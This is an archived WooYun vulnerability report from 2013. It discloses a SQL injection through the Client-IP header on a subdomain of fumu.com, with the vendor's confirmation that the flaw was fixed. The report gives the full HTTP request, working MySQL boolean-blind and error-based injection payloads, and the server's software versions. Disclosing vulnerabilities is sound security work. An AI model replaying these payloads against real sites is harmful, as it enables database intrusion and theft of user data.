漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-042980
漏洞标题:父母网某站Client-IP的SQL注入(DBA权限)导致可跨库查询
相关厂商:父母网
漏洞作者: 霍大然
提交时间:2013-11-15 13:10
修复时间:2013-12-30 13:11
公开时间:2013-12-30 13:11
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-15: 细节已通知厂商并且等待厂商处理中
2013-11-18: 厂商已经确认,细节仅向厂商公开
2013-11-28: 细节向核心白帽子及相关领域专家公开
2013-12-08: 细节向普通白帽子公开
2013-12-18: 细节向实习白帽子公开
2013-12-30: 细节向公众公开
简要描述:
父母网某站Client-IP的sql注入(DBA权限)导致可跨库查询,论坛,taobao啥的都泄露
详细说明:
faxian.fumu.com
注入:
GET /include/toupiao.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
Cookie: 6yBB_fa86_lastvisit=1384479513; 6yBB_fa86_sid=P9mnMe; 6yBB_fa86_lastact=1384483197%09faxian.php%09
Host: faxian.fumu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Place: (custom) HEADER
Parameter: Client-IP #1*
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: ' RLIKE IF(9693=9693,0x436c69656e742d49502c2a,0x28) AND 'rGQy'='rGQy
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: ' AND (SELECT 2979 FROM(SELECT COUNT(*),CONCAT(0x7162686671,(SELECT (CASE WHEN (2979=2979) THEN 1 ELSE 0 END)),0x717a697071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YJeP'='YJeP
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2
back-end DBMS: MySQL 5.0
漏洞证明:
修复方案:
不深入了,省的象金蝶的那样
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-18 10:52
厂商回复:
收到,正在安排修复,非常感谢
最新状态:
2013-11-18:已修复,对 ip 进行过滤。